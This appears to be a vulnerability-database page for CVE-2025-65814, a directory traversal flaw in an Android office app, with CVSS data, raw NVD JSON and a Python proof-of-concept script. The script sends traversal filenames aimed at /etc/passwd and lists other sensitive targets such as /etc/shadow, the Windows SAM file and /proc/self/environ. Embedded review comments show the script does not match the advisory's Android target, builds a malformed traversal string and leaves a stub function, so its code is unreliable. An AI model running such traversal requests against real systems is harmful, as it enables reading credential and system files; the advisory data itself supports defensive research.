Security Vulnerability Report
CVE-2025-65814 CVSS 6.5 MEDIUM

CVE-2025-65814

Published: 2025-12-10 17:15:55
Last Modified: 2025-12-17 17:51:48

Description

A lack of security checks in the file import process of RHOPHI Analytics LLP Office App-Edit Word v6.4.1 allows attackers to execute a directory traversal.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:a1apps:office_app-edit_word\,_pdf_file:6.4.1:*:*:*:*:android:*:* - VULNERABLE
RHOPHI Office App-Edit Word v6.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
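#!/usr/bin/env python3
"""
CVE-2025-65814 PoC - RHOPHI Office App-Edit Word Directory Traversal
This PoC demonstrates the directory traversal vulnerability in the file import function.
"""
# NOTE(review): the advisory data on this page lists an Android application
# (CPE target "android") and references Android guidance on filenames supplied
# by an untrusted ContentProvider. This script instead posts to a placeholder
# HTTP endpoint, so it does not appear to exercise the code path the advisory
# describes. Treat its output as non-authoritative when assessing exposure.
# The usual CWE-22 mitigation is to ignore or sanitise externally supplied
# filenames and to check that the resolved destination path stays inside the
# intended directory before writing.

import requests
import urllib.parse

# Target configuration
TARGET_URL = "http://target-server.com/api/import"
# NOTE(review): TARGET_FILE is defined but never read by the code below.
TARGET_FILE = "../../../../etc/passwd"


def exploit_directory_traversal():
    """
    Exploit the directory traversal vulnerability in file import function.
    The application does not validate file paths properly, allowing path traversal.

    Sends one multipart POST to TARGET_URL and inspects the response body.

    Returns:
        True only when the response is HTTP 200 and its body contains the
        marker "root:"; False otherwise, including on any request error.
    """
    # Construct the malicious filename with path traversal sequence
    # NOTE(review): this expression evaluates to "......../etc/passwd" (eight
    # dots, no separators), which is not the value held in TARGET_FILE. A
    # negative result from this script therefore says nothing about whether a
    # target is patched.
    malicious_filename = ".." * 4 + "/etc/passwd"

    # Prepare the file import request
    files = {
        'file': (malicious_filename, 'test content', 'text/plain')
    }

    # Alternative method: using filename parameter
    # (both `files` and `data` are sent in the same request below)
    data = {
        'filename': malicious_filename,
        'action': 'import'
    }

    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Malicious filename: {malicious_filename}")
    print("[*] Attempting to read: /etc/passwd")

    try:
        # Send the malicious request
        response = requests.post(TARGET_URL, files=files, data=data, timeout=10)
        print(f"[*] Response Status: {response.status_code}")

        if response.status_code == 200:
            # Check if we successfully read the file.
            # The original condition was `'root:' in response.text or
            # response.text`, which is true for any non-empty body and so
            # reported success on every ordinary 200 page. Only the marker
            # is accepted here, to avoid false "confirmed" verdicts.
            if 'root:' in response.text:
                print("[+] SUCCESS! File content retrieved:")
                print("-" * 50)
                print(response.text[:500])  # Print first 500 chars
                print("-" * 50)
                return True

        print("[-] Exploitation may have failed or file not accessible")
        print(f"[-] Response: {response.text[:200]}")
        return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


def test_common_paths():
    """
    Test common sensitive file paths that might be accessible via traversal.

    As written this is a stub: it prints each candidate path and URL-encodes
    it, but sends no request and returns None.
    """
    common_paths = [
        "../../../../etc/passwd",
        "../../../../etc/shadow",
        "..\\..\\..\\windows\\system32\\config\\sam",
        "../../../../var/log/messages",
        "../../../../proc/self/environ"
    ]

    print("\n[*] Testing common sensitive file paths...")
    for path in common_paths:
        print(f"[*] Testing: {path}")
        # Simplified test - in real scenario, adapt to actual API endpoint
        # NOTE(review): encoded_path is computed but never used.
        encoded_path = urllib.parse.quote(path)
        # Add your actual exploitation logic here


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-65814 Directory Traversal PoC")
    print("Target: RHOPHI Office App-Edit Word v6.4.1")
    print("=" * 60)

    # Run the exploit
    success = exploit_directory_traversal()

    if success:
        print("\n[!] Vulnerability confirmed!")
        print("[!] Immediate patching recommended.")
    else:
        print("\n[-] Exploitation did not yield expected results")
        print("[-] Target may be patched or not vulnerable")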

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65814", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:55.090", "lastModified": "2025-12-17T17:51:48.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A lack of security checks in the file import process of RHOPHI Analytics LLP Office App-Edit Word v6.4.1 allows attackers to execute a directory traversal."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:a1apps:office_app-edit_word\\,_pdf_file:6.4.1:*:*:*:*:android:*:*", "matchCriteriaId": "6D8AF847-A594-4902-AC36-CFCDB6DFD673"}]}]}], "references": [{"url": "https://developer.android.com/privacy-and-security/risks/untrustworthy-contentprovider-provided-filename", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}, {"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}